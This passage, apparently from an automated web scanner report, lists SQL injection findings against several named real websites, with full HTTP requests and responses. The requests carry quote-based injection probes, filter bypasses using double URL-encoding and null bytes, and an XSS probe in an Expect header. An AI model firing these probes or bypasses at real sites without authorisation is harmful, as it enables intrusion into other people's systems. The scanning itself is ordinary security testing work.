The database appears to be Oracle.

Request

GET /elephant/login.phtml' HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:00:11 GMT
Server: lighttpd/1.4.28
Content-Length: 112217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.15. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:48 GMT
Server: lighttpd/1.4.28
Content-Length: 112262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.16. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/signup.phtml' HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:09:11 GMT
Server: lighttpd/1.4.28
Content-Length: 112262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.17. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/templates/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:53 GMT
Server: lighttpd/1.4.28
Content-Length: 112240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.18. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates'/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:16 GMT
Server: lighttpd/1.4.28
Content-Length: 112240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.19. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates/features.css'?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:41 GMT
Server: lighttpd/1.4.28
Content-Length: 112240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.20. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/templates/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:54 GMT
Server: lighttpd/1.4.28
Content-Length: 112242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.21. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates'/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:18 GMT
Server: lighttpd/1.4.28
Content-Length: 112242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.22. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates/styles2011.css'?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:41 GMT
Server: lighttpd/1.4.28
Content-Length: 112242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.23. http://www.japanator.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.japanator.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 00:15:05 GMT
Server: lighttpd/1.4.28
Content-Length: 112206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.24. http://www.n1-models.com/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.n1-models.com
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527
Host: www.n1-models.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 416
Date: Sun, 01 May 2011 23:39:26 GMT
X-Varnish: 1801237247
Age: 0
Via: 1.1 varnish
Cneonction: close
X-Served-By: tdd03.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
<h1>Error 417 Expectation Failed</h1>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527%2527
Host: www.n1-models.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 302 (Found)
Location: http://spi.domainsponsor.com/skins/favicon/mi_favicon.ico
Server: Oversee Turing v1.0.0
Content-Length: 32
Content-Type: text/html

<html><body><br></body></html>

1.25. http://www.ourprayer.org/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%00'
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:39 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQueryString, strURL

If Response.Buffer Then
Response.Clear
Response.Status = "500 Internal
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%00''
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:40 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQ
...[SNIP]...

1.26. http://www.ourprayer.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.ico?1%00'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: http://www.ourprayer.org/custerror.html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:06 GMT
Content-Length: 162
Set-Cookie: cookie1=4090937773.1.3717150784.2424965831; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.ourprayer.org/custerror.html">here</a></body>

Request 2

GET /favicon.ico?1%00''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:09 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQ
...[SNIP]...

1.27. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/1797'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:47 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.28. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/1797/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/1797/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:16 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.29. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/1798'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:17 GMT
Server: Apache
Set-Cookie: CAKEPHP=0kq9dnhc6fl22f9at88vsrcnr2; expires=Mon, 09-May-2011 02:52:17 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.30. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/1798/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:05 GMT
Server: Apache
Set-Cookie: CAKEPHP=3pb6bi6fcls5vbnr5d5sj521t6; expires=Mon, 09-May-2011 02:53:06 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/1798/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:07 GMT
Server: Apache
Set-Cookie: CAKEPHP=vs6aum6e4b5h4nisto5to4o977; expires=Mon, 09-May-2011 02:53:07 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=vs6aum6e4b5h4nisto5to4o977; expires=Mon, 09-May-2011 02:53:07 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

